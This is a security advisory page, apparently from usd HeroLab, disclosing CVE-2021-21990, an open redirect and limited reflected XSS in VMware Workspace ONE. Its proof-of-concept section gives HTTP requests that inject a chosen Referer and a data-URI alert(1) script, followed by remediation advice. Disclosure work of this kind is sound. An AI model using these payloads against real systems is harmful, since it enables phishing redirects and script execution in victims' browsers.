{"id":16717,"date":"2021-07-07T12:02:34","date_gmt":"2021-07-07T10:02:34","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2021-0008\/"},"modified":"2022-04-20T15:34:29","modified_gmt":"2022-04-20T13:34:29","slug":"usd-2021-0008","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0008\/","title":{"rendered":"usd-2021-0008"},"content":{"rendered":"\n[et_pb_section fb_built=\"1\" _builder_version=\"4.17.1\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" width=\"100%\" global_colors_info=\"{}\"]

usd-2021-0008 | VMware Workspace ONE<\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2021-0008<\/span>
CVE Number<\/strong>: <\/span>CVE-2021-21990<\/a>
Affected Product<\/strong>: VMware Workspace ONE<\/span>
Vulnerability Type<\/strong>: CWE-79: Cross-site Scripting<\/span>
Security Risk<\/strong>: Low<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/www.vmware.com\/products\/workspace-one.html<\/a>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

A VMware endpoint<\/a> reflects user controlled contents without sanitization, resulting in limited reflected Cross-Site Scripting. The endpoint reflects the Referer HTTP header contents within an HTTP redirect\u2019s Location header without any sanitization. As it allows arbitrary domains, this enables an Open Redirect vulnerability. Further, as arbitrary schemes are allowed, using a data-URI as Referer leads to JavaScript execution in a victim\u2019s browser and under certain circumstances.<\/p>\n

Cross-Site Scripting vulnerabilities could arise if user controlled contents are reflected without sufficient and context-aware sanitization and\/or encoding. If a malicious actor is able to inject malicious JavaScript which is run within the context of an application and in a victim\u2019s browser and session, the malicious actor could potentially steal sensitive information or perform actions on behalf of the victim.<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

The following request response pairs illustrate how the vulnerability could be exploited.<\/p>\n

Please note that we redacted the exact subdomain of awmdm.com \u2013 our tests were performed against a generic AirWatch Hosted (SaaS) instance.<\/p>\n

1. Open Redirect<\/strong><\/p>\n

Request:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||29px||false|false\" global_colors_info=\"{}\"]

GET \/DeviceManagement\/Enrollment\/IsMamEnrollmentEnabled?groupId=%3ca HTTP\/1.1
Host: abcdef.awmdm.com
Referer: https:\/\/www.usd.de\/<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

\u00a0Response:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||29px||false|false\" global_colors_info=\"{}\"]

HTTP\/1.1 302 Found
Cache-Control: private
Content-Type: text\/html; charset=utf-8
Location: https:\/\/www.usd.de\/
[\u2026]
<h2>Object moved to <a href=\u201chttps:\/\/www.usd.de\/\u201c>here<\/a>.<\/h2><\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]

2. Limited XSS<\/strong><\/p>\n

Request:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||29px||false|false\" global_colors_info=\"{}\"]

GET \/DeviceManagement\/Enrollment\/IsMamEnrollmentEnabled?groupId=%3ca HTTP\/1.1
Host: abcdef.awmdm.com
Referer: data:text\/html,alert(1)<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]

\u00a0Response:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||29px||false|false\" global_colors_info=\"{}\"]

HTTP\/1.1 302 Found
Cache-Control: private
Content-Type: text\/html; charset=utf-8
Location: data:text\/html,%3Cscript%3Ealert(1)%3C\/script%3E
[\u2026]
<h2>Object moved to <a>here<\/a>.<\/h2><\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]

\n

Safari on iOS renders HTML and evaluates embedded JavaScript if it is encountered as data<\/em>-URI within a Location<\/em> header:<\/p>\n<\/div>[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2021\/07\/vmware_limited_xss_ios-169x300-1.jpg\" title_text=\"vmware_limited_xss_ios-169x300\" _builder_version=\"4.16\" _module_preset=\"default\" custom_margin=\"27px||43px||false|false\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

\n
\n

Fix<\/h3>\n

It is recommended to consider all user input to the application as potentially malicious. All input to the application should be verified and if necessary replaced. Meta characters should be treated with care. The majority of programming languages supports standard procedures for filtering and replacing meta characters. For example, PHP has the built-in function <\/span>htmlspecialchars()<\/em>. It is recommended to use whitelisting wherever possible.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n